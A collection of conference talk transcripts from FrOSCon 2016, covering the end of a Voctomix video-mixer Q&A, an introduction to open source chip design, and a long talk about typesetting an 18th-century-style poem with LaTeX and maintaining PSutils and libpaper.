of them. And yeah, I don't know. Googling around for Rock2Mix gives some results for packaging. Maybe someone wants to do that for Zuzo, or for Arch Linux, or for, I don't know what there is. Zuzo has packages. Fine. And yeah, if you have problems running Rock2Mix, then just come over to the C3Rock and say, hey, I want to talk to Matze in mind. I can't run Rock2Mix, and I will go with you and try to make you run the software and get you to a point where you can play around with it. I can't guarantee that I will get there, but I would be happy to have someone who helps me, who says, OK, I want to take a look at it. So if you're interested, just come around. And basically, that's it. If you have questions, you can ask them now. Please wait for the microphone or I will not answer your question. If you have questions later, you can join us on IRC. I am usually around there. We are doing a lot of communications through IRC. Or if it's not your way of communicating, please send an email to there. And yeah, I will think to come back to you pretty quick. So there's the first question. Thank you very much. A couple of questions. You are mentioning that basically the video streams are raw, which means that what will happen if in a situation when you have 1632 cameras, how is that going to work? I don't know if it's going to work. Usually we have one or two. So I have not tested it with 16 or 32 cameras. I would imagine that it will run in some problems with the kernel not being able to dispatch this amount of memory to the process. 
At this point, I think I have to repeat, it will not work for everyone and not for every situation. It is made for exactly such a setup. And if you have 16 cameras, then I think it might not be the right tool for you, unfortunately. Replace. It's capable of handling replays. Football streaming, for example. You can press a button and show the last three minutes of video. I think this would be something that you would do in an external script. So you would have to... I think you should be able to have a script that records your video and then you can say, okay, play me back the last three minutes into this input and then mix it back into your program stream. That should work. I think that should be possible to build. But it would not be a functionality of Octomics. It would be an external program, an external script and you can add buttons to the GUI to trigger custom scripts. But you would have to write the script and the recording and other things around, I think. Other questions. Okay. Dann thank you very much for your time and I hope you have a nice first time.
|
In 2014 the C3VOC decided, that it wanted to substitute DVSwitch as a Live-Video-Mixer Software with a HD-Capable solution. Two years later, the FrOSCon 2016 will be produced with Voctomix, our own Live-Video-Mixer System.
|
10.5446/32454 (DOI)
|
Thanks for the introduction. The microphone works in the sense that it is, I think, only for the recording. I will try to speak loudly enough; if anyone can't understand something, clap loudly or something like that. I am going to speak in English now, if that is okay for everyone; if someone doesn't speak English, or on the other hand doesn't speak German, you can still ask your questions in either language. The question I want to start from is: how do you design your own chips? We begin with a story. A story that will be very familiar to those of you who do software development. It is the story of Tom Leer, a man who is a DBA, a database admin, who does database work. And one day he finds a really weird query that just doesn't run properly, and for some reason he has no idea what is actually wrong. He looks at the statistics he gets, and the query still looks wrong. But he looks at the query itself, and it should be fast. So he goes down the stack, through the whole database stack, into the kernel layer. And in the end he sees that the C code looks right; what he has looks right, it is just slow. He digs further and looks at the C code in front of him. He sees that the hotspot in his database query is really one long stretch that spins through a lot of assembler instructions and weird loops. He knows he could make it much faster if the processor he has were modified just a little bit. So he says, no problem, I can check out the processor's source code. He makes some changes, runs a simple simulation, opens a pull request, and two weeks later he goes to the shop and buys the new processor. That sounds unrealistic, yes. And indeed, it doesn't work like that. And the question is: why doesn't it work like that? Why can't we do hardware and chip development the way we actually do software development? Why is software development so much faster, why is it so much cheaper? And that is what we are going to look at today. I will begin with a few words, and I see that I am standing in front of the slides, I am sorry. The cat is always a bit irritating, but it is a FrOSCon tradition, so it has to be there. So, I begin with a few terms. The term I will use most today is digital hardware design. And I use "digital hardware design" to separate it from non-digital hardware design; that is, PCBs, the things makers do, where you take Arduino boards, put them together and program them. What we are going to look at today is digital hardware design, which means that in the end you create your own chips, physical devices; that is what we are hoping for. The other term we will use is free and open source silicon. I think that is a good term to capture this kind of digital hardware design. "Open source hardware" is sometimes used for chip design, but also for the whole maker area, and I try to distinguish the two, because it gets blurry otherwise, and because the techniques and the constraints we have when we design chips are very different. I don't know how many of you, and it is hard to see from up here, but it doesn't really matter: how many of you have ever read or written Verilog code, VHDL code, SystemVerilog code, things like that?
Yeah, just raise your hand. Okay, 20%, 30%, something like that. For all the others: we begin our design with source code, just like we do in software development. But this source code is not quite source code in the usual sense; the design language is a hardware description language, not a programming language. So what you describe, in the end, is how the transistors that make up your chip are connected, or how they behave. You do this at a somewhat higher level, but you are not at as high a level as when you program something C++ based, or the like. So, for all of you who have never done hardware design, I will quickly go through the design flow, the steps you need to get from your idea, which you write down as source code, to the final chip. You start on the left side with your HDL sources, which really are source code, and you also pull in other libraries that you get from vendors or from other sources, the so-called IP cores. That is a weird term, because intellectual property is not really intellectual, nor anyone's property in particular, but that is what it is called. And yes, that is what we have to work with. What you end up with is your design project, the description of your chip. And then there are a couple of ways you can go. First, you can simulate; you can always run simulations, and that is what you want to do. What you get as the output of the simulation is a nice view of a lot of waveforms. So you have all the signals that exist in your system; it is not really visible here, and even when you have it on your own screen it is not much more understandable. So it is really, really underwhelming. But that is the output you get from the simulation. You say, nice, this is what I always wanted to look at, but it is not really that satisfying. The other way is to take the same sources and do synthesis. That means you go from this description in this language to a netlist. And a netlist is a collection of, not only transistors, but also gates and so on, which are connected by wires. When you have the netlist, it is a big tangle of unrouted wires. You basically have a fishing net, with knots, and the gates sit at the knots, all wired together. You get this tangled net out of the synthesis. With that netlist you can go onto silicon, or you can program it onto an FPGA. Who here has never heard of FPGAs? Okay. FPGAs are chips that you can program: they have a fixed fabric, and you can map different functionality onto that fabric. FPGAs are very nice, because in the end you get a real piece of hardware, a real black box that you can hold in your hand, and it has the functionality that you programmed. On the other hand, FPGAs, especially as they get bigger, have their drawbacks; we will have a look at that later. Also the clock rate and the functionality that you can build on an FPGA are limited: on a standard FPGA in the regular price range of a few hundred dollars, or euros, or pounds, you can get to about 200 MHz, which is what you usually use, and you can fit a few small CPU cores, roughly Cortex-M3 class, so very small microcontroller cores.
So in the end, the FPGA implementation is the first kind of chips. Unfortunately, these chips are like the pictures we have here: the picture looks better than the reality. It is all naturally gluten free, and they advertise these chips as a serving of vegetables. I had never seen that before, and I have eaten pounds of chips. But of course these are not quite the chips you actually want. For that you have to do a few more steps, and we will get to those as well, and in the end what you get is the real thing, fat and salty; it takes a lot of work, but that is what you want. So, let's look at reality. We begin with simulation. What do you need for a simulation, and what do you have for a chip design? How much can you do with the open source tools? When do you actually need commercial tools? What is out there? For the simulation you need your code, and you need a simulator. You naturally also want to do some testing. In the software world we have lots of unit tests and system tests that we use; the hardware world is still in old V-model-style development, and there are good reasons for that, which we will also have a look at. Testing is a bit different in hardware than it is in software. But let's begin with the code. For the code there are two languages, the established hardware description languages. We have Verilog, or in its newer version, for everyone who knows it, SystemVerilog. And there is VHDL. If you like C, you will like Verilog; if you like Pascal, then you will like VHDL. That is roughly how the languages look. They both look rather painful and old. But there are a few newer ones. There is Bluespec, which is not freely available. There is Chisel, which is a very interesting system.
|
Buy hardware, write software -- this is the basic rule we in the FLOSS community followed for many years. But things are changing. Today it is easier than ever before to create your own digital hardware, a.k.a. "chips." In this talk I'll give an introduction to what (in terms of tools, knowledge and other factors) is required to get a digital hardware design up and running. I'll also show how to get started: where can I find the community to get help and existing code? What existing projects can I contribute to?
|
10.5446/32455 (DOI)
|
Welcome, everyone, to the last session of the day. Next up is Reuben Thomas, who will be talking about the challenges in typesetting poetry, and getting your writings to come out beautiful on paper. Welcome. Thank you very much. I'll try not to keep you too long from your dinner. So I'll just say a few words about myself to try to explain what might be otherwise a rather perplexing talk. Even after you've read the introductory slide, I have what one might describe as something of a portfolio career. My main employer currently is the Roman Catholic Church. I sing in the choir of Westminster Cathedral in London. And before that, I spent the previous 30 years working for a spin-off, which was nationalised by the English government about 500 years ago, the Church of England. I studied computer science at Cambridge University. And just before that, I was fortunate enough at high school to have compulsory historical and literary studies, even though I mostly specialised in scientific subjects. But you'll see in a moment how that comes into the subject of the work I'm about to describe. So just to give you a quick outline of the talk, I've already given you some personal context. I'm then going to talk about a short, well, not quite so short, poem that I wrote many years ago. The bulk of the talk is about some technical matters that arose as a result of trying to typeset this poem in a particular way, which led me first into LaTeX, and then into various parts of the free software universe. And then I'll end up by going a little bit philosophical and talking about how this relates to Larry Wall's cardinal virtues of the programmer, and also a word about proprietary software. So the central subject of this talk is a poem I wrote. It's not a very long poem. It's about 272 lines long, which is a lot shorter than, I don't know, the Odyssey. So a book of 40 pages, which so far, and I think I'm nearly finished, has taken me almost 24 years to write. And it's a satirical mock epic, which is almost entirely true, but footnoted, prefaced, and with a publisher's foreword that I've made up, which is a slightly unusual way around. And of course, the first question that one might reasonably ask after seeing that summary is, what on earth does this have to do with free software, even though it's obviously a fascinating subject for a talk? Well, of course, like all computer scientists by education, I decided I would typeset this work with LaTeX, and it's a moderately complicated bit of typesetting with 26 different packages. And in particular, some challenges in the actual nitty gritty of the typesetting, the fine detail with some unsupported glyphs that LaTeX doesn't normally have to deal with to draw, because in some cases, they didn't even exist in the fonts, to typeset, and of course, to print. And this was all because I was basing my book design, as indeed the style of the poetry, which makes it up, on an 18th century model, which we'll come to in a moment. And that left me with quite a lot of hacking to do. But first, this is how it came about. This is me about 24 years ago, as you can see already thinking deeply about how on earth I get to typeset this poem that I haven't yet started to write. And that was the year that I started my university education at Cambridge University, and I spent a lot of my time in this place, which is the chapel of St John's College, where we would sing evensong, which is an English invention.
It's a sort of mash-up of the Catholic offices of the hours of Vespers in the late afternoon and Complin in the late evening. And it sort of meets halfway, sort of about just before suppertime, conveniently, so that in the old days, when all the men in college, because of course, until 1982, there were only men in the college, which coincidentally was the year I went there to sing as a boy ten years before I started as an undergraduate. But anyway, in those days, all the men would have to go to even song every day. It was mandatory, so there's enough seating there for about 150 scholars, and then they would go to hall and have their dinner. Well, by the time I was there, the choir often outnumbered the worshippers, and we looked something like that. Coincidentally, this picture was taken while I was in the choir, but I'm the only member of the choir not in it. I must have been away that day. But the actual poem was inspired by quite a different location. We used to tour frequently to the Netherlands, and it was in the winter of 1992 that we made one particular tour, the first of my time as an undergraduate, which made a lasting impression on me. And it was in particular when we stayed in a youth hostel that, as far as I can remember, looked something like this, although I have to say in the interests of strict truth, the fact that this particularly youth hostel is not in the Netherlands, it's just a picture that seemed about right. So that was one part of the inspiration, and then the other part is historical. This is the title page of a work by Alexander Pope, the 18th century English poet, called the Danciad. So this is a mock epic. It is a sort of satire based on the Iliad, Homer's Iliad, and it was pretty much an attack by Pope on all the rivals, other poets, journalists, critics of his day whom he detested. And he wrote it with a great many notes, which he claimed to be by someone called Scribleris, but were in fact all written by him. So this is where we begin to see where I got my idea for my own work. And as you can see, this is a, if I, maybe with a little bit of assistance from a zoom function here. Yes. That's, oh, no, that's not, that's not, that's not, that's the opposite of assistance. That's, there we go. So, oh, 1729, there we go. So this is a 1729 edition, which thanks to the wonders of modern technology, one can find on, in the internet archive. No, yes, good. This is, this is really where all the fuss began, the long S. So this will be familiar to German speakers, of course, in a somewhat restricted form. But historically, this is really, you might almost say a Greek thing, or at least it comes to us in the same form in modern Greek. So here we have a terminal sigma, terminal lowercase sigma, which has a more than a passing resemblance to the modern S. And here we have a non-terminal, which can be an initial or medial sigma, so anywhere but the middle of the word, anywhere but the end of the word, which doesn't bear any resemblance to a long S, but it has exactly the same function. So until the late 18th century, English was tight set with two different S's. And so here's a couple of examples where you can see that in the capital, or at the end of a word, it looks pretty familiar. And all the rest of the time, it looks rather like an F. Only again, if I can hopefully this time slightly more, yes, here we are. So if you look at it very carefully, you'll see that it's not quite an F, because the bar only sticks out on the left. 
Now I didn't want to have to type these all manually. Indeed, at the time I started typesetting it, the book, I didn't even really have that option because although you now have a Unicode code point and some fonts, which even have the long S in the right position, I didn't. So I started typesetting the book in 1998. I finished writing it in 1997. So that took me a mere five years. Then the real fun began. And at that point, there was a package PA-Caslon, which had been written a couple of years earlier, which used the Adobe Caslon font, which comes, if you get all the expert sets, with long S's. And it had sufficient rules for when to use which S and used various bits of arcane TeX magic so that you could type in an ordinary text and it would work out where to use which S. So that was nice. But then, unfortunately, as I said, typesetting took me quite a long time. And by late 2012, when it was time to do what I thought at the time was a final printing, the package PA-Caslon no longer existed. But I also discovered that I needed some extra glyphs. So hang on, what's this about final? Because this is 2016 now, and I already admitted that I still haven't finished this book. Well, I had to have made three attempts in total to finish this book. And here was my first. My first attempt was to have a dinner. And here are some of the people who came to the dinner, a lot of whom feature, in some sense, in the book, because they were all on that original tour back in 1992. So this dinner was held in 2013 in the Wordsworth room, appropriately enough, a room in St. John's College named after William Wordsworth, who was, of course, an English poet, who wrote rather more than I did, of rather better quality in a much shorter time, I might say. So that was great fun. But unfortunately, it didn't actually make me finish the book. I was able to supply everyone with proofs, and I got many useful corrections. But I did not come out with a finished product. And there is the dean of college reading a bit about him, while I'm carefully studying the proof in the background. So I had this defunct font package, which I rather needed to typeset my book. And this is 2012, and of course, by then, we had LuaTeX, which has pretty good support for OpenType fonts, including all sorts of extra features, like alternate glyphs and historical ligatures and ligatures of other sorts. So why didn't I just use that? Well, I had a go, but I couldn't get it to work. And I'll probably get back to that one day, because I probably ought to be up to date with my font technology. So I went back to my PostScript fonts and the ancient fontinst package for LaTeX and pdfTeX. And I hacked around with the various tools that one has for turning PostScript fonts into TeX font metric files and TeX virtual font files, and was able, in the end, to reverse engineer the original package, for which I also was able to get in contact with its author, and even he'd lost the source code. So he was very helpful and sympathetic. But unfortunately, I had to do that. And of course, I had to have a play with TeX font encodings. In fact, there's enough material here for another talk, which really should have been given about 12 years ago, because really one shouldn't be doing this sort of thing anymore, as I say. We should be using OpenType. But I couldn't get it to work in this case. But 2016 is not the time to give a talk about TeX font packages and font encodings. So I'm only going to hint at that.
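As a rough illustration of the kind of rule such a package automates, here is a small, hypothetical Python sketch of the basic substitution described above: use the long s (ſ) everywhere except at the end of a word, plus a couple of the common exceptions (a short s before b and k) that come up again later in the talk. This is only the idea in miniature, not the actual TeX ligature machinery of PA-Caslon, and the full historical rules (hyphenation, s next to f, and so on) are deliberately left out.

    import re

    LONG_S = "\u017f"  # 'ſ', LATIN SMALL LETTER LONG S

    def longify(word: str) -> str:
        """Replace 's' with long s, except word-finally and before b or k."""
        out = []
        for i, ch in enumerate(word):
            nxt = word[i + 1] if i + 1 < len(word) else ""
            if ch == "s" and nxt and nxt not in "bk":
                out.append(LONG_S)   # initial or medial s becomes long s
            else:
                out.append(ch)       # final s, or s before b/k, stays short
        return "".join(out)

    def longify_text(text: str) -> str:
        # Apply the rule word by word, so punctuation counts as a word boundary.
        return re.sub(r"[A-Za-z]+", lambda m: longify(m.group(0)), text)

    print(longify_text("succession of blessings"))  # -> 'ſucceſſion of bleſſings'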
So I mentioned a moment ago that I needed some extra glyphs. So let's just see what was actually going on there. Actually, it's a bit hard to do on a beamer because of the resolution. One day, just before the dinner I mentioned, I had my proofs on my screen at a very high resolution. And I noticed something, which I'm going to make you all notice, by the power of hypnotism, because I don't think it's actually detectable on this lay resolution display. But if you look very carefully, then you will see that in this SSI, sorry, SSI ligature, in the word succession, the upper ligature is the one that I drew. Well I say drew. I really just took apart the original characters and put them back together into a new ligature. And then the lower one has a slightly more bulbous end to the second long S. And the reason for that is that the font, the typographers at Adobe did a, it would be unfair to say they were being lazy because what they did was actually very clever. They set up the metrics of the font so that if you had a double S ligature, this is actually a double long S ligature, and then you put it next to an I, the dot of the I would overlap the end of the S and look pretty good unless an obsessive Englishman happened to take a magnifying glass to it at about 800% in his PDF viewer. So obviously, since I wanted to make a physical book, which would have to, that would be it, I'm not going to go through the process more than once, that I had to improve on that. So obviously I busted out Font Forge, which at the time was the only really sort of comprehensive free software font editor. That's no longer the case actually, but it's still pretty good. So this is my first side project. So in January 2013, I first did a little bit of work on Font Forge. I'd been using it to try to understand why I was having trouble with OpenType, in particular the historical features. And I just happened to look at some of its source code and found a comment that was a bit misleading. So I clarified the comment. So that was my first mistake, it turns out. In July, I've reconstructed the history from looking at the commit logs for Font Forge. In July 2013, I went a bit further and I actually touched the code for the first time, and I did a little bit of tidying up. And then the next year, by which time I'd already used Font Forge to draw my two extra glyphs, a long double SI and a long double SL, beautiful. But then one day in 2014, I opened Font Forge and I found that the entire interface was using GNU Unifont, which is a wonderful font of last resort, which has a glyph every single Unicode code point, and they update it every time there's a new version of Unicode. But you really don't want it in your user interface. And the reason that this had happened was because of a mistaken bit of configuration in Font Forge's resources. So I fixed that, and after that, it was all downhill. I found myself doing all sorts of general code cleanup and simplification in Font Forge that had nothing to do with anything I was actually using it for. And then a couple of months later, Dave Crossland, who is a great and energetic advocate and activist for Free Fonts, invited me to work on Metapolator, which is something completely different. So it needs a different window. I should just quickly, this is really a sort of advertising break. I should just say that if you're at all interested in amazing things you can do with fonts these days, you should definitely have a look at Metapolator. This is metapolator.com. 
It's still somewhat of a prototype, but the basic idea is that you can have two fonts. Here we have a Roboto Slab Lite and Roboto Slab Bold, which you probably can't quite see because there are tiny letters there. But what you should be able to see is if I move this slider, it changes the font. And it's actually generating that on the fly. And in general, Metapolator is a set of technologies for making font families that are essentially parametric, rather like, you may think, since I've been talking about tech and latech throughout this talk, the original computer modern fonts. But updated in such a way that they're easier to use for typographers who today are probably less used, like Donald Nooth, to actually programming their fonts in a sort of dialective list or meta font or whatever. And instead would rather have something a bit more graphical. So there's Metapolator, which I should also say is involved. It was conceived originally by Simon Egley, the user interface by Peter Siking, and has mostly been programmed by the indefatigable Lassifista. So back to late 2012, a more urgent problem I had just before this dinner, which was supposed to be my way of finishing the book, was that I couldn't actually print the book, which is for a document that is supposed to be printed and bound and available for people to handle was a bit of a disaster. That turned out to be because of a bug in the PDF printing stack at the time, at least in the current, whatever, was the current version of Ubuntu. That would probably have been precise at the time since it was late 2012. And that was not something I had the ability to fix in a couple of days. So I thought I'd use a clever workaround, which was instead to print from PostScript. And PSutils is an excellent suite of programs for manipulating PostScript. And so I thought I would use them to get my PostScript pages and arrange them in a book that I could print neatly as a booklet that people could have at the dinner. Unfortunately, it turned out that at that point PSutils had a bug when printing N up. So you want to print, in my case, something like A5 pages on an A4 sheet, which I'll then fold in to make a booklet in a fairly obvious way. So I fixed the bug. And then I had another bad moment because I noticed that the package was no longer maintained upstream. So I got to work. I added all the patches that Debian had put in over the years. I rewrote a lot of the documentation. I rewrote the build system. I used lib paper everywhere so that you could use human readable paper sizes like A4 and B5 rather than having to give dimensions in points or millimeters or something like that. And I also managed to simplify the code somewhat. I mean, the upshot in the end was I became the maintainer of PSutils. So accidentally while writing a book, that's six months of employment working on Metapolator. And I've suddenly acquired the maintainership of a free software package. Oops. And also there was one more last minute bug, which was that after all this duplex printing of PostScript didn't work. So I had to manually duplex having spent a great deal of money on a printer with a duplex unit. So I just mentioned lib paper, which was at the time a Debian specific library for describing paper sizes. Very simple. You just have a list of paper sizes and their dimensions in various units. It might be millimeters or points or inches depending on the natural unit for the paper size. So you'd probably describe A4 in millimeters and US letter size in inches. 
For example, that was worked by Yves Arrouill and Adrien Bonk. But it was unmaintained for several years by the time I got my hands on it. You can see where this is going. So it was an optional dependency of PSutils at the time. PSutils was a portable package. Lib paper was only intended for Debian. But I thought, well, it would be nice if it didn't have to be optional. So again, I applied all the Debian patches. Yes, there were Debian patches, even though it was a Debian native package. I added more paper sizes. There are, of course, nice lists that you can find in places like Wikipedia. And it was actually surprising that you might think that there'd be pretty much infinite number of paper sizes. And there probably is in reality. But I could only find about, I don't know, 30 or 40 by searching various places on the internet. I updated the build system, removed KNR-C support, because the program was written long enough ago that it still supported pre-ANSI compilers, rewrote the documentation, simplified configuration, as you can see, the list goes on and on. Oh, one nice thing was actually that on modern GNU Linux systems, it turns out that you can get the default paper size for a particular locale. From a non-standard locale setting, LC underscore paper. Although, unfortunately, it's only in integral numbers, which is unfortunate because not all paper sizes are expressible. It's an integral number of millimeters, in particular, US letter size. But that's another story. But anyway, it's nice because now you don't actually need to configure a default paper size. If assuming you're using your locale's default, which is going to be the case for 99.9% of users, you can just read that from the system. Oh, and I rewrote it in Perl. Now, hang on. This is a C library. What's going on here? Well, there were a few things I wanted to achieve here. For verification, I managed to get this package, which does a pretty trivial job, right? Taking a list of paper size names and dimensions, and you can match dimensions to a size or find this dimensions from a size. That's all you really want to do, plus have per user settings and a system default. That was nearly 50, well, getting on for 1,500 lines of code in C. I reduced it to about 150 in Perl. Obviously, I got rid of lots of bugs because everyone knows that if you delete code, you remove bugs as well. Made it accessible from other languages because the previous, because lib paper really was just a C library. If you wanted to access it from any other language, you had to write, you had to use a binding to the C library. Now, of course, you have the opposite problem that you have a small executable, which is very easy to use for most languages, because you just run it with some command line arguments and you get back a result. That's not a thing that's quite easy to do in C, so I'll say how I solved that problem in a moment. At the same time, keep it portable because I think, again, it's a reasonable assumption that if you are running on a particular computer system, a program that needs to ask the user about paper sizes, you've probably got Perl installed. Later, I decided to write PSutils in Perl 2, but I'm not going to tell that story today, so don't worry. Then finally, on this nested dive, I've gone from wanting to print a book to maintaining PSutils to pretty much maintaining lib paper and rewriting it. Now, I'd like to share this work with other people and inflict it on the rest of the world. 
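To give an idea of just how small that job is, here is a hypothetical Python sketch of the core of such a paper library: a table of names and dimensions, a lookup by name, and a reverse match from measured dimensions back to a name with a small tolerance. The sizes listed and the tolerance are illustrative and not taken from libpaper itself.

    # Dimensions in PostScript points (1 pt = 1/72 inch); values are rounded.
    PAPER_SIZES = {
        "a4": (595.0, 842.0),
        "a5": (420.0, 595.0),
        "letter": (612.0, 792.0),
        "legal": (612.0, 1008.0),
    }

    def size_of(name):
        """Return (width, height) in points for a known paper name."""
        return PAPER_SIZES[name.lower()]

    def name_of(width, height, tolerance=2.0):
        """Find the paper name matching the given dimensions, if any."""
        for name, (w, h) in PAPER_SIZES.items():
            if abs(w - width) <= tolerance and abs(h - height) <= tolerance:
                return name
        return None

    print(size_of("A4"))       # (595.0, 842.0)
    print(name_of(612, 792))   # 'letter'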
So I thought that if I wanted to get paper into Debian and also help update PSutils in Debian, then I'd better actually become a Debian maintainer, because it wasn't something that anyone else is going to be interested in with two basically unmaintained packages. And for non-specialists in the room, I should say Debian maintainer is not the same thing as a Debian developer. So in other words, not somebody with a vote on important matters and high-level access. This is basically a sort of supervised access to Debian only. So at this point, I should just make an acknowledgment to Wookie for seconding my Debian maintainer application and Dmitry John-Ledkov for signing my GPG key twice because of confusion over how long it had to be. I don't know, I just seem to attract bugs sometimes. That one was just a bug where two different places in the Debian Wookie had different information on how long a maintainer key had to be. This work is still ongoing. If you are interested in very old paper-based things, then I'm hoping to get it into Debian unstable in the next few months. So that sort of takes us up to the end of 2014 also. Every year later, I still hadn't finished the book. So I thought I should have another go. The next go was this talk because I thought, well, if I had to give a talk, which it would be nice to actually show a book, then I'll have to finish the book, right? Well, it almost worked. More on that later. But I'm sorry that if you read my summary and we're hoping to see an actual book, then I don't have one today. But nearly. So usually one looks into the morals of a project when you're sure it's absolutely over. And I'm going to provide some evidence that I think I have got sufficiently close to the end that I can do that now. And as I was thinking back on it, it occurred to me that this has something to do with the cardinal virtues of the programmer as laid out famously by Larry Wall in his book, Programming Pearl. Yes, Programming Pearl, the camel book anyway. So for those who are slightly rusty in their memory of Programming Pearl, the three cardinal virtues of the program are laziness, impatience, and hubris. And we'll just look at how those pertain to this project one by one. So I'm a great believer in going back to the sources, checking that you have remembered correctly what you mean by a term that's important. So I've actually found the quote from the second edition of Programming Pearl. Laziness is defined by Larry Wall and his co-authors as the quality that makes you go to great effort to reduce overall energy expenditure. It makes you write labor-saving programs that other people will find useful and document what you wrote. So you don't have to answer so many questions about it, hence the first great virtue of a programmer. Well, as far as what I've tried to do with the various projects I've described, I would say I have tried to be lazy, although I can say also that it didn't feel like that at the time. I'm not sure quite how you'd apply this virtue to poetry. Arguably from a poetic point of view, I've done a ridiculous amount of work other than actually writing words. But I think anyone in the audience who is familiar with procrastinating will recognize the temptation to get involved in side projects. So second virtue, impatience. So again, quoting from Programming Pearl, the anger when you feel when the computer is being lazy, which is a nice bit of recursion, this makes you write programs that don't just react to your needs but actually anticipate them. 
So I would argue that, again, a large part of the work I did on the typesetting of the long S was precisely with this in mind. There are all sorts of rules. There's a wonderful blog post I used, which you will find if you search for Rules for Long S, where someone actually went and looked at a great number of old books and deduced, because nobody as far as we can tell ever really wrote it down, deduced the rules for when you use a long S and when you use a short S. Because although what I said at the beginning is basically true, that you use the long S everywhere except at the end of a word and the short S at the end of a word, it turns out there are quite a few exceptions whether to do with particular letters, such as you think the short S before a B or a K, and there are also rules about what you have to do with hyphenation and all that sort of thing. So it's really not the sort of thing you want to do manually, choosing between the two versions of the letter. You really want the computer to do it, and hence you want the computer to not be lazy and do all the work for you. On the other hand, I did wait an awfully long time for the support to be written in the first place, and then I waited so long that it became obsolete again. And you could argue that that's a bit too much patience. Finally hubris. So programming Pearl again, it says of hubris, the quality that makes you write and maintain programs that other people won't want to say bad things about. Well, it's interesting to read that because I actually thought that it meant something a bit different, which proves that over the years you can easily forget the original sense of a text that you read. Because I think often people use refer to hubris as a shorthand for it's sometimes a good idea to do something new. But that's not really what Larry Wolz is saying here at all. So apologies for contradicting the published talk abstract in the sense that actually having read that again, I have to say that I don't think I've gone against that at all. Although possibly other people won't want to say bad things about. Well, if nobody else uses the programs, then of course they're not going to say bad things about it. So possibly not writing programs that are so obscure that nobody wants to say bad things about them. I wouldn't necessarily advise that. I said it also at the beginning, I would say a word about proprietary code. Now the only proprietary code I've actually mentioned in this talk is the Adobe Castlon font. And I would just say that I think that does count as code. Well, I mean, apart from anything else from a practical point of view, of course, software fonts as opposed to old fashioned pieces of metal do actually come under copyright law rather than just design law. And so although Adobe Castlon was issued in 1990 and I think 1992 it was updated, it still won't be out of copyright until the Disney Corporation finally fails to persuade the US Congress to extend the copyright on Mickey Mouse's ears. So in other words, it's still in copyright and will be for a very long time. But despite that pain in the neck, sometimes proprietary code is all there is and you have to kind of try and work with it. The biggest, the most obvious example in this case being that I needed to make some changes to the font, I needed some extra glyphs. And of course, I can't distribute those extra glyphs. 
So what I do in the Adobe Castlon latex package, which I contributed my long S support to, is I simply give hints on how you might use a font editor to recreate the glyphs if you want. And if you don't put in that effort, then you can still have all the extra long S support without my two extra ligatures and that's fine. So it degrades nicely. Of course, one nice thing, at least if you're thinking long term, is that in any particular case you can beat proprietary code in a sense by share patience because eventually the copyright will run out. Although often, of course, one dies before that point, which is sad. And of course, realistically, I would love to have a free alternative to Adobe Castlon. I only used it because I couldn't find a free typeface that had an 18th century style and was actually drawn. I found several that had just been quite nicely scanned from books so that if you wanted to make a book that looked as though it was made in the 18th century, rather than just in an 18th century style, they would be fine. And of course, with full support for the long S, say with all the extra ligatures. So if anyone knows of such a thing, I'd love to hear about it. So at the end of any epic, well, at the end of almost any poem, at least from the 18th century, you have to have a moral. So I've got several from my last 24 years of experience with this project. First, I think I've just said proprietary code is a pain and fonts are more engineering than art, which is why they come under the heading of code. Waiting often helps. So I've given some examples where it helps. I've given some examples where it helped, didn't actually help because too much waiting can be a bad thing. But it was amazing how many of my little type setting problems were solved by packages that were written long, long after I started the project. I think there's some value in allowing your passions, as I say, to mutate. So this is, of course, one way to cope if you're waiting. It's another way to cope if you're procrastinating. But the fact that I enjoyed both writing poetry, making a book, and also hacking on various bits of free software, I think made the overall experience rather more interesting. And even, as I said earlier, with my work on Metapolite, or even resulted in some employment, which is a bit of an odd thing for something to come out of trying to imitate an 18th century poet. So that was that sort of fun and for profit there. And then on a programming side, old code, I said here, old code repays new effort. And I think, of course, most code repays effort. If you put effort into improving, maintaining, extending code, you usually expect to get something out of that other than just the enjoyment of doing it. But I think old code has some particular advantages because, as I say below, abandoned projects, especially those started years ago, are often simple and small. They're not fast-moving targets. So stepping up to help with them can be very easy because there's maybe one maintainer left or no maintainers at all. So you don't have to engage with lots of process. And you can just start by fixing a few small things. I think you saw the pattern in the various projects I was involved in. It mostly started with a small fix and then turned into something larger. Although as I think I've also illustrated, it can end with you taking on perhaps a rather more responsibility than you might have intended. That might be a good thing, too. But I think there's quite a lot of code like that. 
So if you look at any system, especially one based on free software, you'll find that most of the effort is at the bleeding edge, I think. And with a few exceptions, such as, say, the Linux kernel itself, there's not so much effort right in the core. There's a lot of code that doesn't perhaps need a great deal of effort. It's quite happy. But on the other hand, an awful lot of long-standing bugs that are annoying people that have kind of fossilized, that have familiar workarounds, but why not go and fix one or two of them, make the world a slightly less, a slightly more reduced friction of the free software world? And finally, of course, not forgetting that there are other things than code, which is sort of where I started. So my final attempt to finish the book, I came up with just before, just in the last few weeks, just as I was starting to write this talk. And in the end, the most effective way to finish it proved to be not to finish it. So as I said at the close to the beginning, the main aim of the typesetting project was to have a physical book that's actually sewn into signatures, which are small numbers of pages folded together, and that you then sew together into a larger book and bind in leather, perhaps, or in cloth. And I realized that, of course, in the 18th century, where every page had to be laboriously set with metal type by hand, you probably had to print all the books in a print run from the same set pages. But in the 21st century, where I'm doing my in-printing, that's the one bit I'm sort of keeping 21st century technology, with a laser printer, it doesn't really matter. And so now, I just decided, well, if I didn't have any dreadful errors, I could just carry on tweaking the text every time I print out a new copy. But rather than throwing the copy away, I can keep it and make it into a slightly different book so that if you remember that photograph of all the people who were at that dinner three years ago, each of whom paid in their ticket price for a copy of the book, they'll all now be getting slightly different versions of the book, which I hope will amuse them. So as of Friday, well, that's yesterday, isn't it? Gosh, sorry, I've been travelling quite a lot in the last few days. But as of yesterday, I had five copies sitting on my desk at home, ready to go to the binder, and I hope to accelerate some more and get up to more like 25, which is how many I'm going to have bound next week. And so I should have in that set about six or seven different editions, all in the first print run, which is a nice 21st century thing to be able to do. So I just thought I'd give you a flavour of what I've actually produced. And I'm going to give it to you in two forms, because I think I've just about got enough time. I haven't seen one of those cards yet, and I'm just now seeing that I have 15 minutes left, which is definitely long enough for this and one or two questions. I'm going to show you what it looks like and read you what you can see as well. There's the poetry, not the footnotes. So I don't know if you can see these numbers, but we're at line 240, which is quite close to the end. I did describe the poem as a mock, mock epic, because, well, if we go back to the original, of course, an epic, we might expect to be several books long and certainly several thousand lines and on a very serious subject like wars between gods or heroes or that sort of thing and involve lots of ships and horses and swords and that sort of thing. 
